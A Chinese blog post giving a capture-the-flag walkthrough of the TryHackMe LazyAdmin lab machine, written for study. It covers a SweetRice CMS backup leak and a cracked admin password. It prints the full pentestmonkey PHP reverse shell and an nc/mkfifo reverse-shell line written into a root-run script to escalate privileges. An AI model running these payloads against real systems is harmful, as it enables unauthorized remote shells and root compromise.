CTF靶机 LazyAdmin 笔记

最新推荐文章于 2023-12-02 16:48:46 发布
最新推荐文章于 2023-12-02 16:48:46 发布
阅读量579 收藏 1
点赞数
分类专栏: Try Hack Me靶机 Linux提权 文章标签: linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/107183538
版权

LazyAdmin

靶机介绍:简单的linux机器来练习你的技能

靶机标签:安全,Linux

Nmap 扫描开发端口

开放了22 / 80端口

nmap -A 10.10.239.65 -p-

首先访问80页面 是apache的默认页面

用dirbuster扫描网站目录

/content/as下是个登录页面。

常见的弱口令试了一下,都不行。

网站下面有个CMS信息 SweetRice CMS

先到exploit-db上查找对应的漏洞

有备份披露,任意文件上传,php代码执行。。。

简单的看了一下EXP文件上传和代码执行都要登录后台实现

先看下备份泄露能不能进后台

路径:http://localhost/inc/mysql_backup

访问一下确实存在数据库备份

还存在配置不当,目录遍历漏洞

把数据库备份下载到本地,查看到一堆SQL语句,里面有一个比较显眼的MD5,对应的账号manager

破解的对应密码:Password123

登录到后台

 

首先想到用任意文件上传拿WebShell,试了任意文件上传的EXP没有成功。

然后试了PHP代码执行。在Ads广告管理功能处。

先写个phpinfo()测试一下。Ads name就是PHP文件名。Ads code 写PHP代码

加上目录遍历方便多了

访问解析成功

直接上传一个PHP脚本反弹一个Shell

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.


set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;


//
// Daemonise ourself if possible to avoid zombies later
//


// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    
    if ($pid) {
        exit(0);  // Parent exits
    }


    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }


    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}


// Change to a safe directory
chdir("/");


// Remove any umask we inherited
umask(0);


//
// Do the reverse shell...
//


// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}


// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);


$process = proc_open($shell, $descriptorspec, $pipes);


if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}


// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);


printit("Successfully opened reverse shell to $ip:$port");


while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }


    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }


    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);


    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }


    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }


    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}


fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);


// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}


?>

攻击机监听端口,访问反弹Shell.php

反弹成功

先查看一下user.txt

提权查看一下能用sudo提权 是个.pl文件

先用python获得一个交互式的TTY

python -c  'import pty; pty.spawn("/bin/bash")'

查一下backup.pl文件。backup.pl文件执行了另一个/etc/copy.sh

查看copo.sh文件执行了一个反向shell

再copy.sh文件中插入反弹语句

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.46.228 4567 >/tmp/f" >/etc/copy.sh

攻击机另起监听,反弹Shell

读取root.txt

z4yn:)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透(一)Lazysysadmin
qq_42180996的博客
04-26 3813
靶机Lazysysadmin 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)漏洞扫描 1.开启nessusd服务,加载插件,登录 2.建立扫描 3.扫描结果 (三)ssh爆破(22端口) 1.启动msf终端 2.搜索ssh_login的相关工具...
靶机实战-Lazysysadmin
滕财然的博客
01-19 1465
靶机实战-Lazysysadmin 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 //也可以做主机发现 2、扫描开放端口 确认端口开的服务:nmap -sV -T4 -O -p 端口 IP 发现有Mysql、SSH、Samba 首先22端口ssh爆破:要有字典 启动msfconsole show options:查看需要的参数 添加目...
Lazysysadmin靶机环境搭建与渗透测试
qq_43647462的博客
11-23 846
LazySysAdmin 攻击环境 两台服务器均放在了VM中进行环境搭建,均采用了NET连接的方式,但是由于个人环境问题,所以导致了靶机无法正常连接至NET网络,手工配置IP,在开机界面按下e,将ro改成rw signie init=/bin/bash,ctrl+x进入命令行 在已知kali攻击机的ip为x.x.x.100的情况下,手工配置ip ifconfig eth0 x.x.x.101 netmask 255.255.255.0 broadcast x.x.x.255 route add defaul
Lazysysadmin[靶机]
weixin_43736033的博客
03-14 528
主机发现: 排除网关254 本地1 kali机器128 所以134是靶机 扫描结果如图 用enum4linux 穷举smb服务 连接进入smb服务 将smb服务 挂载到本地 访问txt文件 尝试利用 密码12345 连接ssh 链接后各种尝试 没有权限操作 可以用sudo su提权 提权以后访问进入root目录找到 在回到刚刚的wordpress中 在各文件夹中找有用的信息 进入到...
lazysysadmin靶机练习
yifujiadeng的博客
04-24 163
lazysysadmin靶机练习 网络结构: 环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.138 kali linux ip:192.168.1.137 信息收集: 主机发现: nmap -sP 192.168.1.0/24 端口扫描: nmap -sV 192.168.1.138 可以看到目标主机开放了samba服务,先放着一会再看 目录爆破: 这里用了kali里已有的dirb进行目录遍历 dir
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
我的ctf刷题wp笔记
03-25
### CTF刷题WP笔记解析 #### 1. SWPUCTF 2021 新生赛 —— whitegive_pwnV1 本题目聚焦于一个典型的CTF比赛中的二进制漏洞利用挑战,名为“whitegive_pwnV1”。通过对题目描述的解读,我们可以深入分析其中涉及的...
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
ctf笔记 杂项 web 密码学基础笔记
最新发布
07-05
### CTF笔记:杂项、Web与密码学基础 #### 一、文件处理技术 **1.1 文件分离** 在CTF竞赛中,文件分离是一项常见的技能,用于从复合文件中提取有用的数据。 - **Binwalk**: 是一个强大的工具,可以用来识别文件...
LazyAdminV2:启动项目
02-14
LazyAdminV2:启动项目
Vulnhub-lazyadmin靶机实战
御七彩虹猫
03-24 2967
Vulnhub-lazyadmin靶机实战
LazySysAdmin 渗透靶机练习
繁星流动天际
07-02 308
下载链接:https://www.vulnhub.com/entry/lazysysadmin-1,205/ 扫描目标主机 ...省略输出 有用的信息包括: http://x.x.x.x/phpmyadmin/ http://x.x.x.x/wordpress/wp-admin http://x.x.x.x/wordpress/ 找到疑似用户名的:togie 使用enum4linux x.x.x.x,查找有用信息。 smbclient //x.x.x.x/shar.
靶机lazyadmin
qq_45212316的博客
12-02 965
配置环境靶机ip:192.168.87.174。
1. Lazysadmin渗透实战
qq_46389295的博客
03-24 350
攻击机:Kali 攻击机ip:192.168.1.120 靶机发现: nmap -sn 192.168.1.1/24 开放端口扫描 nmap -sS 192.168.1.117 操作系统以及端口上的服务版本 nmap -sV -p22,80,139,445,3306,6667 -O 192.168.1.117 可以尝试对ssh服务进行暴力破解 medusa -M ssh -h 192.16...
CTF_靶机学习
vurtual的博客
02-27 770
** pwn_2 ** 在学逆向网站开启靶机 把目标文件read复制到虚拟机中 把靶机地址拷贝下来 用objdump -t -j .text read查看文件里的函数 查看到有exploit func函数。其他都是系统的函数。 进入gdb disass func函数 看到有调用read函数。 <+7>和<+12>是系统check栈,不用管。 <+4><+17>一共提升了0x28的空间 disass exploit函数 复制首地址 运行这个pyth
渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
hljzzj的博客
01-23 6870
phpinfo文件上传+LFI(文件包含)获取shell,suid提权
kali渗透综合靶机(三)--bulldog2靶机
W小哥
03-07 1212
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至Virtual...
ctf5靶机 sql
07-28
抱歉,我无法回答关于CTF靶机的问题。 #### 引用[.reference_title] - *1* *3* [Vulnhub-CTF6靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124817304)[target="_blank" data-report-click={"spm...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值